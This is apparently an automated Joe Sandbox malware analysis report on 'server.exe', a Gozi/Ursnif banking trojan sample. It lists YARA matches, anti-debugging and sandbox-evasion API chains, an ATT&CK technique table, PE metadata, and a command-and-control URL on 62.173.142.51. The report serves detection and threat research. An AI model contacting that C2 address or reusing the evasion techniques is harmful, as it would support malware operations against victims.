      Source: 00000000.00000003.494622294.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.494622294.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: Process Memory Space: server.exe PID: 5540, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: Process Memory Space: server.exe PID: 5540, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_0040110B GetProcAddress,NtCreateSection,memset,0_2_0040110B
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00401459 NtMapViewOfSection,0_2_00401459
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004019F1 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_004019F1
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00541C58 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,CreateThread,QueueUserAPC,GetLastError,TerminateThread,SetLastError,WaitForSingleObject,GetExitCodeThread,GetLastError,GetLastError,0_2_00541C58
      Source: server.exeReversingLabs: Detection: 32%
      Source: server.exeVirustotal: Detection: 43%
      Source: server.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\server.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\Desktop\server.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
      Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@1/1
      Source: C:\Users\user\Desktop\server.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\server.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\server.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Data Obfuscation

      barindex
      Source: C:\Users\user\Desktop\server.exeUnpacked PE file: 0.2.server.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
      Source: C:\Users\user\Desktop\server.exeUnpacked PE file: 0.2.server.exe.400000.0.unpack
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00401000 LoadLibraryA,GetProcAddress,0_2_00401000

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: Yara matchFile source: 00000000.00000003.494639050.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.494532027.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.580772569.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.494557591.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.494507047.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.494595207.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.494478374.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.494674831.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.494622294.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 5540, type: MEMORYSTR
      Source: C:\Users\user\Desktop\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\server.exeEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleepgraph_0-1468
      Source: C:\Users\user\Desktop\server.exeAPI call chain: ExitProcess graph end nodegraph_0-1189
      Source: C:\Users\user\Desktop\server.exeAPI call chain: ExitProcess graph end nodegraph_0-1460

      Anti Debugging

      barindex
      Source: C:\Users\user\Desktop\server.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleepgraph_0-1468
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00540D90 mov eax, dword ptr fs:[00000030h]0_2_00540D90
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_0054092B mov eax, dword ptr fs:[00000030h]0_2_0054092B
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00401000 LoadLibraryA,GetProcAddress,0_2_00401000
      Source: C:\Users\user\Desktop\server.exeCode function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_004019F1
      Source: C:\Users\user\Desktop\server.exeCode function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,CreateThread,QueueUserAPC,GetLastError,TerminateThread,SetLastError,WaitForSingleObject,GetExitCodeThread,GetLastError,GetLastError,0_2_00541C58
      Source: C:\Users\user\Desktop\server.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00401D68 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_00401D68
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004015B0 GetSystemTimeAsFileTime,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,0_2_004015B0

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000000.00000003.494639050.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.494532027.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.580772569.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.494557591.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.494507047.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.494595207.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.494478374.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.494674831.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.494622294.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 5540, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000000.00000003.494639050.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.494532027.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.580772569.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.494557591.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.494507047.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.494595207.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.494478374.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.494674831.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.494622294.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 5540, type: MEMORYSTR
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts2
      Windows Management Instrumentation
      Path InterceptionPath Interception1
      Virtualization/Sandbox Evasion
      OS Credential Dumping1
      System Time Discovery
      Remote ServicesData from Local SystemExfiltration Over Other Network Medium2
      Non-Application Layer Protocol
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default Accounts11
      Native API
      Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts21
      Software Packing
      LSASS Memory1
      Security Software Discovery
      Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth12
      Application Layer Protocol
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager1
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
      Ingress Tool Transfer
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDS114
      System Information Discovery
      Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
      Remote System Discovery
      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      server.exe32%ReversingLabsWin32.Trojan.Generic
      server.exe43%VirustotalBrowse
      server.exe100%Joe Sandbox ML
      No Antivirus matches
      SourceDetectionScannerLabelLinkDownload
      0.2.server.exe.680000.2.unpack100%AviraHEUR/AGEN.1245293Download File
      0.2.server.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://62.173.142.51/2%VirustotalBrowse
      http://62.173.142.51/drew/kjSOZcm1saisXVulw/nMJdjuoxI5rY/D8rf0rwxZvy/xTo4u6qyfG2cqh/DrEm9eSMLtL3Mt_2100%Avira URL Cloudmalware
      http://62.173.142.51/drew/kjSOZcm1saisXVulw/nMJdjuoxI5rY/D8rf0rwxZvy/xTo4u6qyfG2cqh/DrEm9eSMLtL3Mt_2BWc8v/UHxdAMkcyeaROQd9/EwiLplzlm9gCiDQ/KqEVG_2BN1u2apPrXD/iYwyB9P6y/3dh1O1SBALUj6nSMRJfH/HHlM5d4xQO9d95rkA_2/Bt59zcQMsfJpOgJC8GeSrH/5REGnF8guLwya/xQ1cfd2Y/w3tCRH4bjXIzu_2B_2F_2B5/MmfV_2FK_2/B5ux_2BgxJ6omqMfT/iSBh1mrWB9_2/BRaJgBOq4gEVdF7OIVd_2B/4.jlk100%Avira URL Cloudmalware
      http://62.1730%VirustotalBrowse
      http://62.173.142.51/100%Avira URL Cloudmalware
      http://62.1730%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      checklist.skype.com
      unknown
      unknownfalse
        high
        NameMaliciousAntivirus DetectionReputation
        http://62.173.142.51/drew/kjSOZcm1saisXVulw/nMJdjuoxI5rY/D8rf0rwxZvy/xTo4u6qyfG2cqh/DrEm9eSMLtL3Mt_2BWc8v/UHxdAMkcyeaROQd9/EwiLplzlm9gCiDQ/KqEVG_2BN1u2apPrXD/iYwyB9P6y/3dh1O1SBALUj6nSMRJfH/HHlM5d4xQO9d95rkA_2/Bt59zcQMsfJpOgJC8GeSrH/5REGnF8guLwya/xQ1cfd2Y/w3tCRH4bjXIzu_2B_2F_2B5/MmfV_2FK_2/B5ux_2BgxJ6omqMfT/iSBh1mrWB9_2/BRaJgBOq4gEVdF7OIVd_2B/4.jlktrue
        • Avira URL Cloud: malware
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://62.173.142.51/server.exe, 00000000.00000002.580573765.0000000000706000.00000004.00000020.00020000.00000000.sdmpfalse
        • 2%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        http://62.173server.exe, 00000000.00000002.580755093.000000000281C000.00000004.00000010.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        low
        http://62.173.142.51/drew/kjSOZcm1saisXVulw/nMJdjuoxI5rY/D8rf0rwxZvy/xTo4u6qyfG2cqh/DrEm9eSMLtL3Mt_2server.exe, 00000000.00000002.580573765.0000000000706000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        62.173.142.51
        unknownRussian Federation
        34300SPACENET-ASInternetServiceProviderRUtrue
        Joe Sandbox Version:37.0.0 Beryl
        Analysis ID:826308
        Start date and time:2023-03-14 15:59:46 +01:00
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 5m 57s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
        Number of analysed new started processes analysed:5
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample file name:server.exe
        Detection:MAL
        Classification:mal100.troj.evad.winEXE@1/0@1/1
        EGA Information:
        • Successful, ratio: 100%
        HDC Information:
        • Successful, ratio: 31.5% (good quality ratio 31.5%)
        • Quality average: 89%
        • Quality standard deviation: 15.4%
        HCA Information:
        • Successful, ratio: 90%
        • Number of executed functions: 16
        • Number of non-executed functions: 7
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe
        • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        No simulations
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        62.173.142.51KOYCdGz80D.exeGet hashmaliciousUrsnifBrowse
          server.exeGet hashmaliciousUrsnif, CryptOneBrowse
            server.exeGet hashmaliciousUrsnifBrowse
              server.exeGet hashmaliciousUrsnifBrowse
                server.exeGet hashmaliciousUrsnifBrowse
                  No context
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  SPACENET-ASInternetServiceProviderRUKOYCdGz80D.exeGet hashmaliciousUrsnifBrowse
                  • 62.173.142.51
                  server.exeGet hashmaliciousUrsnif, CryptOneBrowse
                  • 62.173.142.51
                  server.exeGet hashmaliciousUrsnifBrowse
                  • 62.173.142.51
                  server.exeGet hashmaliciousUrsnifBrowse
                  • 62.173.142.51
                  server.exeGet hashmaliciousUrsnifBrowse
                  • 62.173.142.51
                  server.exeGet hashmaliciousUrsnifBrowse
                  • 62.173.140.236
                  server.exeGet hashmaliciousUrsnifBrowse
                  • 62.173.140.236
                  server.exeGet hashmaliciousUrsnifBrowse
                  • 62.173.140.236
                  server.exeGet hashmaliciousUrsnifBrowse
                  • 62.173.141.36
                  server.exeGet hashmaliciousUrsnifBrowse
                  • 62.173.141.36
                  lQj2udnlAj.exeGet hashmaliciousUrsnifBrowse
                  • 62.173.141.36
                  server.exeGet hashmaliciousUrsnifBrowse
                  • 62.173.141.36
                  server.exeGet hashmaliciousUrsnifBrowse
                  • 62.173.138.6
                  server.exeGet hashmaliciousUrsnifBrowse
                  • 62.173.138.6
                  server.exeGet hashmaliciousUrsnifBrowse
                  • 62.173.138.6
                  server.exeGet hashmaliciousUrsnifBrowse
                  • 62.173.140.103
                  server.exeGet hashmaliciousUrsnifBrowse
                  • 62.173.140.103
                  server.exeGet hashmaliciousUrsnifBrowse
                  • 62.173.140.103
                  server.exeGet hashmaliciousUrsnifBrowse
                  • 62.173.140.103
                  server.exeGet hashmaliciousUrsnifBrowse
                  • 62.173.140.103
                  No context
                  No context
                  No created / dropped files found
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):6.482937257572218
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:server.exe
                  File size:192000
                  MD5:8f092511c91bfc1f2516e420739a7967
                  SHA1:dc67d8f55a6591d16c2709ea65ad143e3a216ec0
                  SHA256:9261b47b4fd67523f7afe640e55ccb95ec8b154b5dfa34a8564986ac3e97fe1a
                  SHA512:500fa61eec6d02ed95e8a36ffe7160cb1833cd605e3c994d2e1cf09fb7bfd420b1ec3d8f296f863f309fb558afdd77253f5c541dbff1053cc5fbe14df598a154
                  SSDEEP:1536:FiqBYFyzXY04aevCQ6V4PLi5jYhsQUFYXxOT6jKBTfjMMTxYjlLmN1j+s8OyWYYE:FfwGezi5jYzTjYMMTxuLmz+scqt7
                  TLSH:9A142A0392B07D54F6318A32BE3ECAE9B62FFA514F29776622186E1F05B1071CD62717
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U....j...j...j..~.\..j..~.i..j..~.].Hj....d..j...j..bj..~.X..j..~.m..j..~.j..j..Rich.j..........PE..L....8.b...................
                  Icon Hash:70d2eeeacacaeadd
                  Entrypoint:0x4030a3
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:TERMINAL_SERVER_AWARE
                  Time Stamp:0x62AC38B0 [Fri Jun 17 08:17:52 2022 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:479608e06cc12a8fdc6e43a7370e252b
                  Instruction
                  call 00007F2244AEFFEEh
                  jmp 00007F2244AED78Eh
                  mov edi, edi
                  push ebp
                  mov ebp, esp
                  mov eax, dword ptr [ebp+08h]
                  xor ecx, ecx
                  cmp eax, dword ptr [0040D008h+ecx*8]
                  je 00007F2244AED915h
                  inc ecx
                  cmp ecx, 2Dh
                  jc 00007F2244AED8F3h
                  lea ecx, dword ptr [eax-13h]
                  cmp ecx, 11h
                  jnbe 00007F2244AED910h
                  push 0000000Dh
                  pop eax
                  pop ebp
                  ret
                  mov eax, dword ptr [0040D00Ch+ecx*8]
                  pop ebp
                  ret
                  add eax, FFFFFF44h
                  push 0000000Eh
                  pop ecx
                  cmp ecx, eax
                  sbb eax, eax
                  and eax, ecx
                  add eax, 08h
                  pop ebp
                  ret
                  call 00007F2244AEFC65h
                  test eax, eax
                  jne 00007F2244AED908h
                  mov eax, 0040D170h
                  ret
                  add eax, 08h
                  ret
                  call 00007F2244AEFC52h
                  test eax, eax
                  jne 00007F2244AED908h
                  mov eax, 0040D174h
                  ret
                  add eax, 0Ch
                  ret
                  mov edi, edi
                  push ebp
                  mov ebp, esp
                  push esi
                  call 00007F2244AED8E7h
                  mov ecx, dword ptr [ebp+08h]
                  push ecx
                  mov dword ptr [eax], ecx
                  call 00007F2244AED887h
                  pop ecx
                  mov esi, eax
                  call 00007F2244AED8C1h
                  mov dword ptr [eax], esi
                  pop esi
                  pop ebp
                  ret
                  mov edi, edi
                  push ebp
                  mov ebp, esp
                  mov ecx, dword ptr [ebp+08h]
                  test ecx, ecx
                  je 00007F2244AED91Dh
                  push FFFFFFE0h
                  xor edx, edx
                  pop eax
                  div ecx
                  cmp eax, dword ptr [ebp+0Ch]
                  jnc 00007F2244AED911h
                  call 00007F2244AED89Fh
                  mov dword ptr [eax], 0000000Ch
                  xor eax, eax
                  pop ebp
                  ret
                  imul ecx, dword ptr [ebp+0Ch]
                  push esi
                  mov esi, ecx
                  test esi, esi
                  jne 00007F2244AED903h
                  Programming Language:
                  • [C++] VS2010 build 30319
                  • [ASM] VS2010 build 30319
                  • [ C ] VS2010 build 30319
                  • [IMP] VS2008 SP1 build 30729
                  • [RES] VS2010 build 30319
                  • [LNK] VS2010 build 30319
                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0xb73c0x50.text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x9e0000x10710.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2c200x40.text
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x10000x1ac.text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000xb0dc0xb200False0.5144838483146067data6.004854081582009IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .data0xd0000x9058c0x13000False0.9473555715460527data7.85866639754507IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc0x9e0000x107100x10800False0.29835464015151514data3.787774889182005IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  NameRVASizeTypeLanguageCountry
                  RT_CURSOR0xac9480x130Device independent bitmap graphic, 32 x 64 x 1, image size 0
                  RT_CURSOR0xaca900x130Device independent bitmap graphic, 32 x 64 x 1, image size 0
                  RT_CURSOR0xacbc00xf0Device independent bitmap graphic, 24 x 48 x 1, image size 0
                  RT_CURSOR0xaccb00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0
                  RT_ICON0x9e6d00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishFinland
                  RT_ICON0x9e6d00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishNorway
                  RT_ICON0x9e6d00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishSweden
                  RT_ICON0x9ef780x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishFinland
                  RT_ICON0x9ef780x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishNorway
                  RT_ICON0x9ef780x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishSweden
                  RT_ICON0xa00480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsSami LappishFinland
                  RT_ICON0xa00480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsSami LappishNorway
                  RT_ICON0xa00480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsSami LappishSweden
                  RT_ICON0xa0ef00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsSami LappishFinland
                  RT_ICON0xa0ef00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsSami LappishNorway
                  RT_ICON0xa0ef00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsSami LappishSweden
                  RT_ICON0xa17980x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsSami LappishFinland
                  RT_ICON0xa17980x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsSami LappishNorway
                  RT_ICON0xa17980x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsSami LappishSweden
                  RT_ICON0xa1e600x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsSami LappishFinland
                  RT_ICON0xa1e600x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsSami LappishNorway
                  RT_ICON0xa1e600x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsSami LappishSweden
                  RT_ICON0xa23c80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600Sami LappishFinland
                  RT_ICON0xa23c80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600Sami LappishNorway
                  RT_ICON0xa23c80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600Sami LappishSweden
                  RT_ICON0xa49700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224Sami LappishFinland
                  RT_ICON0xa49700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224Sami LappishNorway
                  RT_ICON0xa49700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224Sami LappishSweden
                  RT_ICON0xa5a180x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400Sami LappishFinland
                  RT_ICON0xa5a180x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400Sami LappishNorway
                  RT_ICON0xa5a180x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400Sami LappishSweden
                  RT_ICON0xa63a00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088Sami LappishFinland
                  RT_ICON0xa63a00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088Sami LappishNorway
                  RT_ICON0xa63a00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088Sami LappishSweden
                  RT_ICON0xa68800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0Sami LappishFinland
                  RT_ICON0xa68800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0Sami LappishNorway
                  RT_ICON0xa68800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0Sami LappishSweden
